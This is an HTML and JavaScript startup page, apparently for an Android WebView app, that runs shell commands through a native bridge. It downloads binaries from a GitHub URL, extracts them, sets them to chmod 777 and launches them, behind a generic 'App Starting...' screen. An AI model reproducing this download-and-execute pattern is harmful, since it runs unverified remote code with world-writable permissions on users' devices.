<!DOCTYPE html>
<html>

<meta name="viewport" content="width=device-width, initial-scale=1">

<head>

    <style type="text/css">
        @import url('https://fonts.googleapis.com/css?family=Montserrat&display=swap');

        * {
            box-sizing: border-box;
        }

        body {
            background-color: #f4f4f4;
            flex-direction: column;
            font-family: 'Montserrat', sans-serif;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }

        .progress {
            background-color: #d8d8d8;
            border-radius: 20px;
            position: relative;
            margin: 15px 0;
            height: 30px;
            width: 300px;
        }

        .progress-done {
            background: linear-gradient(to left, #F2709C, #FF9472);
            box-shadow: 0 3px 3px -5px #F2709C, 0 2px 5px #F2709C;
            border-radius: 20px;
            color: #fff;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100%;
            width: 0;
            opacity: 1;
            transition: 0.2s ease 0.2s;
        }

        .wel {

            position: relative;
            margin: 15px 0;
            text-align: center;
            font-size: 16px;
            font-weight: bold;
        }

        .con {
            position: relative;
            margin: 15px 0;
            text-align: center;
            font-size: 16px;
        }
    </style>
</head>

<body>

    <div class="wel" id="wel">Welcome to XyZ</div>

    <div class="progress" id="pbar">

        <div class="progress-done" id="perc"></div>

    </div>

    <div class="con" id="content"></div>


    <script>



        function launch() {
            Dwn.lauch();
        }

        function xyz(sz = 0) {

            var url = 'https://raw.githubusercontent.com/sebastian275/simple/main/';

            var size = 0;
            var ttf = 2;

            var openssl = Dwn.exec('ls -l /data/data/com.xx/libopenssl.so');
            if (openssl.includes("-rwxrwxrwx")) {
                Dwn.startx();

                document.querySelector('.progress-done').style.width = '100%';
                document.getElementById("perc").innerHTML = '100%';

                document.getElementById("content").innerHTML = 'App Starting...';

                setTimeout(launch, 500);

            }

            var xtarz = Dwn.exec('ls -l /data/data/com.xx/xtarz');
            if (xtarz.includes("xtarz")) {
                if (!xtarz.includes("-rwxrwxrwx")) {
                    Dwn.exec("chmod 777 /data/data/com.xx/xtarz");
                }

                if (xtarz.includes("-rwxrwxrwx")) {

                    if (openssl.includes("libopenssl.so")) {
                        if (!openssl.includes("-rwxrwxrwx")) {
                            Dwn.exec("chmod 777 /data/data/com.xx/libopenssl.so");

                            setTimeout(xyz, 100);

                        }
                    } else {


                        var lstar = Dwn.exec('ls /data/data/com.xx/libopenssl.tar');
                        if (lstar.includes("libopenssl.tar")) {
                            var xvf = Dwn.exec("tar -xvf /data/data/com.xx/libopenssl.tar -C /data/data/com.xx/");
                            if (xvf.includes("libopenssl.so")) {
                                document.getElementById("content").innerHTML = 'App Starting...';
                                Dwn.exec("rm /data/data/com.xx/libopenssl.tar");
                                Dwn.exec("chmod 777 /data/data/com.xx/libopenssl.so");

                                Dwn.startx();

                                setTimeout(launch, 500);

                            }
                            setTimeout(xyz, 500);

                        } else {
                            var lstarxz = Dwn.exec('ls -l /data/data/com.xx/libopenssl.tar.xz');
                            if (lstarxz.includes("libopenssl.tar.xz")) {
                                if (lstarxz.includes(sz)) {
                                    Dwn.exec("/data/data/com.xx/xtarz -d /data/data/com.xx/libopenssl.tar.xz");
                                }
                                document.getElementById("content").innerHTML = 'App Starting...';
                                setTimeout(xyz, 500);

                            } else {
                                size = Dwn.initx(url + "libopenssl.tar.xz", "/data/data/com.xx/libopenssl.tar.xz");
                                document.getElementById("content").innerHTML = 'Downloading [2/' + ttf + ']';
                                setTimeout(updx, 500, 0);
                            }

                        }

                    }


                } else {
                    setTimeout(xyz, 500);
                }


            } else {
                size = Dwn.initx(url + "xtarz", "/data/data/com.xx/xtarz");
                document.getElementById("content").innerHTML = 'Downloading [1/' + ttf + ']';
                setTimeout(updx, 100, 0);
            }





            function updx(progx = 1) {

                var prog = Dwn.getProgreass() * progx;

                if (prog < 0) {
                    prog = 0;
                }

                var compl = Math.floor(prog / size * 100);

                if (compl < 0) {
                    compl = 0;
                }


                document.querySelector('.progress-done').style.width = compl + '%';


                if (compl == 100) {

                    document.getElementById("perc").innerHTML = compl + '%';

                    setTimeout(xyz, 500, size);

                } else {
                    if (compl > 9) {
                        document.getElementById("perc").innerHTML = compl + '%';
                    } else {
                        document.getElementById("perc").innerHTML = '';
                    }
                    setTimeout(updx, 500);
                }

            }


        }



        if (Dwn.exec('ls /data/data/com.xx')) {
            xyz();
        } else {
            document.querySelector('.progress-done').style.width = '100%';
            document.getElementById("perc").innerHTML = '100%';
            document.getElementById("content").innerHTML = 'App Starting....';
        }



    </script>

</body>

</html>